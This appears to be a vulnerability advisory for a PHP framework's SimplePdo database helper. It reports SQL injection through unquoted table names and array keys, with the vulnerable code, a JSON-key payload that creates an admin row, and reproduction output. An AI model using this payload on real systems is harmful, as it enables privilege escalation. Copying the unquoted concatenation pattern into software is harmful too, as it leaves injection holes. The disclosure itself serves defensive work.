SimplePdo::insert(), SimplePdo::update(), and SimplePdo::delete() build SQL statements by concatenating the $table argument and the keys of the $data array directly into the query, with no identifier quoting and no validation. When an application forwards user-controlled data shapes to these helpers — a common and documented pattern, e.g. $db->insert('users', $request->data->getData()) — an attacker can inject arbitrary SQL by crafting malicious array keys.
flight/database/SimplePdo.php:
// insert (≈ 320-373)
$sql = sprintf(
"INSERT INTO %s (%s) VALUES (%s)",
$table, // raw concat
implode(', ', $columns), // raw array_keys($data)
implode(', ', $placeholders)
);
// update (≈ 397-409)
$sets[] = "$column = ?"; // $column = user-controlled key
$sql = sprintf(
"UPDATE %s SET %s WHERE %s",
$table, // raw
implode(', ', $sets),
$where
);
// delete (≈ 427-429)
$sql = "DELETE FROM $table WHERE $where";
No identifier-quoting helper exists; neither $table nor the data keys are validated against a safe-identifier pattern.
A controller does:
$db->insert('users', $request->data->getData());
The attacker sends the JSON body:
{"name, is_admin) VALUES (?, 1);-- ": "attacker_injected"}
Generated SQL:
INSERT INTO users (name, is_admin) VALUES (?, 1);-- ) VALUES (?)
After the -- comment, the effective statement INSERT INTO users (name, is_admin) VALUES (?, 1) binds the single placeholder 'attacker_injected', yielding a row with is_admin = 1.
Reproduced live on an in-memory sqlite database (testproj/sqli_live2.php):
id=1 name=alice is_admin=0
id=2 name=attacker_injected is_admin=1 <-- injected insert
UPDATE injection via the $where parameter was also reproduced: `$db->update('users', ['is_admin' => 1], "id = 1 OR...
3.18.1Exploitability
AV:NAC:LPR:LUI:NScope
S:UImpact
C:HI:HA:H8.8/CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H